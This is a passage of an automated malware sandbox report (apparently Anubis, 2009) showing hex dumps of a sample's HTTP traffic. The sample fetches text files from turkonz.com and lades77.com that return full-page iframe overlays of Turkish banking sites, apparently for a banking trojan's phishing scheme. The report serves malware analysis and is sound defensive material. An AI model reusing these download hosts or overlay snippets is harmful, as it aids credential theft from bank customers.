3039 2031 313a 3031 3a34 3520 474d 540d    09 11:01:45 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7974 7572 6b69 7368 2e74 7874

from ANUBIS:1057 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 164 - Transferred inbound Bytes: 738

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
7475 726b 6973 682e 7478 7420 4854 5450    turkish.txt HTTP
2f31 2e31 0d0a 436f 6e74 656e 742d 5479    /1.1..Content-Ty
7065 3a20 7465 7874 2f68 746d 6c0d 0a48    pe: text/html..H
6f73 743a 2077 7777 2e6c 6164 6573 3737    ost: www.lades77
2e63 6f6d 0d0a 4163 6365 7074 3a20 7465    .com..Accept: te
7874 2f68 746d 6c2c 202a 2f2a 0d0a 5573    xt/html, */*..Us
6572 2d41 6765 6e74 3a20 4d6f 7a69 6c6c    er-Agent: Mozill
612f 332e 3020 2863 6f6d 7061 7469 626c    a/3.0 (compatibl
653b 2049 6e64 7920 4c69 6272 6172 7929    e; Indy Library)
0d0a 0d0a                                  ....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3437    ar 2009 11:01:47
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 363a 3236    an 2009 04:16:26
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 642d 3139 332d 3436 3131 6561 3730    05d-193-4611ea70
3664 6138 3022 0d0a 4163 6365 7074 2d52    6da80"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
330d 0a43 6f6e 7465 6e74 2d54 7970 653a    3..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
7475 726b 6973 6862 616e 6b2e 636f 6d2f    turkishbank.com/
696e 6465 782e 6874 6d22 200d 0a77 6964    index.htm" ..wid
7468 3d31 3030 250d 0a68 6569 6768 743d    th=100%..height=
3130 3025 2020 6d61 7267 696e 6865 6967    100%  marginheig
6874 3d22 3022 206d 6172 6769 6e77 6964    ht="0" marginwid
7468 3d22 3022 2020 7363 726f 6c6c 696e    th="0"  scrollin
673d 226e 6f22 200d 0a62 6f72 6465 723d    g="no" ..border=
2230 2220 0d0a 6672 616d 6562 6f72 6465    "0" ..frameborde
723d 2230 2220 0d0a 746f 703d 2230 2220    r="0" ..top="0" 
6c65 6674 3d22 3022 3e0d 0a59 6f75 7220    left="0">..Your 
6272 6f77 7365 7220 646f 6573 206e 6f74    browser does not
2073 7570 706f 7274 2069 6e6c 696e 6520     support inline 
6672 616d 6573 206f 7220 6973 2063 7572    frames or is cur
7265 6e74 6c79 2063 6f6e 6669 6775 7265    rently configure
6420 0d0a 6e6f 7420 746f 2064 6973 706c    d ..not to displ
6179 2069 6e6c 696e 6520 6672 616d 6573    ay inline frames
2e0d 0a3c 2f49 4652 414d 453e 3c2f 6469    ...</IFRAME></di
763e                                       v>

from ANUBIS:1058 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6173    GET /img/jpg/yas
792e 7478 7420 4854 5450 2f31 2e31 0d0a    y.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a31 3220 474d 540d 0a41 6363    4:22:12 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3861 6235 3263    s..ETag: "8ab52c
3261 3132 3764 6339 313a 6164 3966 6322    2a127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a34 3720 474d 540d    09 11:01:47 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7961 7379 2e74 7874              /js/yasy.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6173    GET /img/jpg/yas
792e 7478 7420 4854 5450 2f31 2e31 0d0a    y.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a31 3220 474d 540d 0a41 6363    4:22:12 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3861 6235 3263    s..ETag: "8ab52c
3261 3132 3764 6339 313a 6164 3966 6322    2a127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a34 3720 474d 540d    09 11:01:47 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7961 7379 2e74 7874              /js/yasy.txt

from ANUBIS:1059 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 735

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6173 792e 7478 7420 4854 5450 2f31 2e31    asy.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3439    ar 2009 11:01:49
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 323a 3236    an 2009 04:12:26
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3034 372d 3139 302d 3436 3131 6539 3862    047-190-4611e98b
3862 6538 3022 0d0a 4163 6365 7074 2d52    8be80"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
300d 0a43 6f6e 7465 6e74 2d54 7970 653a    0..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6261 6e6b 6173 7961 2e63 6f6d 2f69 6e64    bankasya.com/ind
6578 2e6a 7370 2220 0d0a 7769 6474 683d    ex.jsp" ..width=
3130 3025 0d0a 6865 6967 6874 3d31 3030    100%..height=100
2520 206d 6172 6769 6e68 6569 6768 743d    %  marginheight=
2230 2220 6d61 7267 696e 7769 6474 683d    "0" marginwidth=
2230 2220 2073 6372 6f6c 6c69 6e67 3d22    "0"  scrolling="
6e6f 2220 0d0a 626f 7264 6572 3d22 3022    no" ..border="0"
200d 0a66 7261 6d65 626f 7264 6572 3d22     ..frameborder="
3022 200d 0a74 6f70 3d22 3022 206c 6566    0" ..top="0" lef
743d 2230 223e 0d0a 596f 7572 2062 726f    t="0">..Your bro
7773 6572 2064 6f65 7320 6e6f 7420 7375    wser does not su
7070 6f72 7420 696e 6c69 6e65 2066 7261    pport inline fra
6d65 7320 6f72 2069 7320 6375 7272 656e    mes or is curren
746c 7920 636f 6e66 6967 7572 6564 200d    tly configured .
0a6e 6f74 2074 6f20 6469 7370 6c61 7920    .not to display 
696e 6c69 6e65 2066 7261 6d65 732e 0d0a    inline frames...
3c2f 4946 5241 4d45 3e3c 2f64 6976 3e      </IFRAME></div>

from ANUBIS:1060 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 630

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6465    GET /img/jpg/yde
6e2e 7478 7420 4854 5450 2f31 2e31 0d0a    n.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a35 3320 474d 540d 0a41 6363    4:22:53 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3839 3934 3434    s..ETag: "899444
3231 3237 6463 3931 3a61 6439 6663 220d    2127dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 313a 3439 2047 4d54 0d0a    9 11:01:49 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 6465 6e2e 7478 74                js/yden.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6465    GET /img/jpg/yde
6e2e 7478 7420 4854 5450 2f31 2e31 0d0a    n.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a35 3320 474d 540d 0a41 6363    4:22:53 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3839 3934 3434    s..ETag: "899444
3231 3237 6463 3931 3a61 6439 6663 220d    2127dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 313a 3530 2047 4d54 0d0a    9 11:01:50 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 6465 6e2e 7478 74                js/yden.txt

from ANUBIS:1061 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 743

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6465 6e2e 7478 7420 4854 5450 2f31 2e31    den.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3532    ar 2009 11:01:52
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 333a 3431    an 2009 04:13:41
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3034 632d 3139 382d 3436 3131 6539 6433    04c-198-4611e9d3
3132 3734 3022 0d0a 4163 6365 7074 2d52    12740"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
380d 0a43 6f6e 7465 6e74 2d54 7970 653a    8..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6465 6e69 7a62 616e 6b2e 636f 6d2f 5452    denizbank.com/TR
2f64 656e 697a 6261 6e6b 2e68 746d 2220    /denizbank.htm" 
0d0a 7769 6474 683d 3130 3025 0d0a 6865    ..width=100%..he
6967 6874 3d31 3030 2520 206d 6172 6769    ight=100%  margi
6e68 6569 6768 743d 2230 2220 6d61 7267    nheight="0" marg
696e 7769 6474 683d 2230 2220 2073 6372    inwidth="0"  scr
6f6c 6c69 6e67 3d22 6e6f 2220 0d0a 626f    olling="no" ..bo
7264 6572 3d22 3022 200d 0a66 7261 6d65    rder="0" ..frame
626f 7264 6572 3d22 3022 200d 0a74 6f70    border="0" ..top
3d22 3022 206c 6566 743d 2230 223e 0d0a    ="0" left="0">..
596f 7572 2062 726f 7773 6572 2064 6f65    Your browser doe
7320 6e6f 7420 7375 7070 6f72 7420 696e    s not support in
6c69 6e65 2066 7261 6d65 7320 6f72 2069    line frames or i
7320 6375 7272 656e 746c 7920 636f 6e66    s currently conf
6967 7572 6564 200d 0a6e 6f74 2074 6f20    igured ..not to 
6469 7370 6c61 7920 696e 6c69 6e65 2066    display inline f
7261 6d65 732e 0d0a 3c2f 4946 5241 4d45    rames...</IFRAME
3e3c 2f64 6976 3e                          ></div>

from ANUBIS:1062 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 630

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6265    GET /img/jpg/ybe
742e 7478 7420 4854 5450 2f31 2e31 0d0a    t.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a32 3320 474d 540d 0a41 6363    4:22:23 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3866 3636 3233    s..ETag: "8f6623
3031 3237 6463 3931 3a61 6439 6663 220d    0127dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 313a 3533 2047 4d54 0d0a    9 11:01:53 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 6265 742e 7478 74                js/ybet.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6265    GET /img/jpg/ybe
742e 7478 7420 4854 5450 2f31 2e31 0d0a    t.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a32 3320 474d 540d 0a41 6363    4:22:23 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3866 3636 3233    s..ETag: "8f6623
3031 3237 6463 3931 3a61 6439 6663 220d    0127dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 313a 3534 2047 4d54 0d0a    9 11:01:54 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 6265 742e 7478 74                js/ybet.txt

from ANUBIS:1063 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 736

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6265 742e 7478 7420 4854 5450 2f31 2e31    bet.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3535    ar 2009 11:01:55
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 323a 3432    an 2009 04:12:42
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3034 382d 3139 312d 3436 3131 6539 3961    048-191-4611e99a
